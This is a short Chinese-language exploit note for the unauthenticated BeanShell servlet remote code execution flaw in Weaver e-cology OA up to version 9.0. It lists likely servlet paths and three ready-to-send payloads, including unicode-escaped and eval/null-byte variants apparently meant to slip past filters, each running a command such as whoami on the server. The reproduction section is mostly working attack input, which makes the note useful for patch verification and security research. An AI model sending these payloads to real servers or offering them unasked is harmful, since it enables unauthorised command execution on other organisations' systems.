0x00 漏洞原理
该漏洞位于 e-cology OA系统BeanShell组件中,并且该组件允许未授权访问,攻击者可通过访问该组件执行任意的Java代码,导致远程命令执行。
0x01影响版本
泛微 e-cology<=9.0
0x02复现
可能的路径
/weaver/bsh.servlet.BshServlet
/weaveroa/bsh.servlet.BshServlet
/oa/bsh.servlet.BshServlet
payload:
bsh.script=exec("whoami");&bsh.servlet.output=raw
bsh.script=u0065u0078u0065u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\"command\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami
0x03参考
https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204